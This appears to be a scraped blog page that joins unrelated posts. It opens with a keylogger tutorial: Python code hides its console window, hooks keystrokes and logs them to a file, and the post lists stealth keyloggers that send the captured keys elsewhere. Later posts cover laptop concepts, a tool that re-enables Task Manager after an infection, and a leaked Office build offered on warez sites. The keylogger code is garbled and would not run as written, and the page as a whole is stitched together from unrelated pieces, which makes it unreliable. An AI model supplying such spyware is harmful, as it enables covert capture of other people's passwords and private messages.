As we all surely know, a keylogger is a program that can intercept everything the user types on the keyboard of your computer. And I suppose you know so well, precisely for this characteristic, the keylogger is software that does not always lend itself to use proper legal, so much so that now almost all have antivirus features to recognize the presence of a keylogger active in the background.

So the installation of a keylogger on a computer without the knowledge of the rightful owner, is configured as a real crime of violation of privacy: the intercepted data (chat sessions, usernames and passwords, email, ...) in fact are usually saved to a log file that the owner of the keylogger retrieve it later or even the are automatically sent via email.

Educational purposes only, we will see how we can create a simple keylogger fully functional, using the Python. Here are the steps to follow:

  1. Download and install the necessary software:
  2. From the Start menu, select "Python 2.6> PythonWin" to start the editor
  3. From the menu select "File> New", then choose the "Python Script" and give "OK"
  4. Paste the following source (attention to indentation)

    import WIN32API
     import win32console
     import win32gui

     import pythoncom, pyHook

     win32console.GetConsoleWindow win = ()
     win32gui.ShowWindow (win, 0)

     final OnKeyboardEvent (event):
       if event.Ascii == 5:
         _exit (1)

      if event.Ascii! = 0 or 8:
        f = open ( 'c: \ output.txt', 'r')
        buffer = f.read ()
        f.close ()
        f = open ( 'c: \ output.txt', 'w')
        keylogs = chr (event.Ascii)
        if event.Ascii == 13:
          keylogs = '/ n'
        buffer + = keylogs
        f.write (buffer)
        f.close ()

     hm = pyHook.HookManager ()
     hm.KeyDown = OnKeyboardEvent
     hm.HookKeyboard ()
     pythoncom.PumpMessages ()

  5. Save the file in c: \ as "logger.py," then by PythonWin type CTRL + R: the keylogger will come started in the background and will run until the log file "C: \ output.txt" anything that will typed on the keyboard.

Here is a list of some other free and good Keyloggers that work in background and without getting noticed even in the Task Manager, sends you the list of typed strokes.

2.REFOG Free Keylogger

3.Actual Keylogger

Apparently when it was suggested to build a Home Computer, the trade analysts predicted that there would be a demand for only 2 PCs a year. Times have flown and look where we are now! In a family of four with modest means, we own 2 desktops and 2 Laptops! The point is, we have seen many creative concepts in laptops and PCs on YD over the years. Agreed many are farfetched, but dreaming big is a part of the creative process. Here is a look at Ten Futuristic Computer Concepts that we hope get realized.

10) MacBook Touch by Tommaso Gecchelin

Highlights: flexibility in form-factor via iSpine technology, flexible OLED screen, and Magic Dock that externalize ports to keep the appearance clean.

9) HP LiM (Less is More) Concept by Jeffrey S. Engelhardt

Highlights: use of Bamboo fabric across the aluminum frame of the PC, 19″ transparent touch OLED screen along with a wireless keyboard, virtual trackpad.

8 ) Evolve Modular CPU by Vas Obeyesekere of Point Innovation

Highlights: transforms between mobile and home computing configurations and can expand or contract its module based components to meet any user’s needs.

7) Mac Folder by Tryi Yeh

Highlights: a re-worked User Interface that resembles the iPod Touch or iPhones’, super-slim multi-touch screen.

6) Dual Screen Computer by Yong-Seong Kim

Highlights: a large slot behind the LCD display that can accommodate the notebook thus allowing you to use it as a desktop, notebook’s screen transforms into a second display in portrait mode.

5) Canvas by Kyle Cherry

Highlights: designed for those in the creative arts fields, offers a wide are for workspace.

4) The Napkin PC by Avery Holleman

Highlights: Uses e-ink and RF technology, designed for group collaborations, has pens like modules that transmit info to the base station PC, processed info is displayed on the napkin which is actually e-ink paper.

3) Book Laptop by Kyle Bean

Highlights: it showcases the trend that we have become so dependent on technology and the virtual world, that we have forgotten about the REAL one that we live in.

2) B-membrane by Won-Seok Lee

Highlights: built-in projector that removes the need for a separate monitor, a membrane keyboard that appears when needed, integrated optical drive, projector can beam ambient lights.

1) Sony Vaio Zoom Notebook Concept by Eno Setiawan

Highlights: thin glass form factor, touchscreen holographic technology, screen is completely transparent and the keyboard goes opaque when switched off.

Enable Task Manager, Registry, RUN, And More When Disabled By A Viruses

You may not believe this but there still are lots of computer users that have no anti-virus program installed because they erroneously think that they will be spared from infection. Some don’t even know what a computer virus is!

But when I boot the computer, I am often faced with the same problem; the virus has made some changes to the system restrictions in order to hide itself from easy detection. These restrictions are most often: show hidden files not working, disabled task manager, disabled firewall and the list goes on. Of course a system reinstall will solve the problems but that is a painstakingly long process. This is where Re-Enable can help.

Re-Enable is a free portable tool for Windows developed by Tangomouse that enables Task Manager, Registry(Regedit), Run Command, CMD Dialog, Folder Options, and System Restore Configuration when disabled by a virus.

With Re-Enable, it is very easy to enable back the options, simply select the options that you want to re-enable and hit Enable button. That’s all.

We have seen in past several Microsoft windows 7 builds getting leaked with latest windows 7 build 7127 which is claimed to be part of RTM branch. Now a new development milestone of the next iteration of the Office System has been leaked and made available for download in the wild. Microsoft is currently making its way to the first Beta of office 2011, a release slated to be available to all users as a public testing build.

However, the Redmond-based company managed to keep a tight lid on all details associated with the development process of Office 2010/14 since the delivery of the Technical Preview build in July 2010. Still, the silence must not be mistaken for inactivity, as the leaked Office 2010 Build 4417 comes to prove.

Office 14 is leaked from one of trusted source wzor.Both the 32-bit and the 64-bit flavors of Office 2010 Build 4417 have been leaked and are now up for grabs from various third-party sources. And while torrent trackers and warez websites are serving the bits illegally, Microsoft continues to be mute on the development of Office 2010.

Still, the productivity suite is undoubtedly advancing. According to Wzor, Office 2010 Build 14.0.4417.1000 is labeled as a Beta release, and no longer just a Technical Preview.

Here are some screenshots
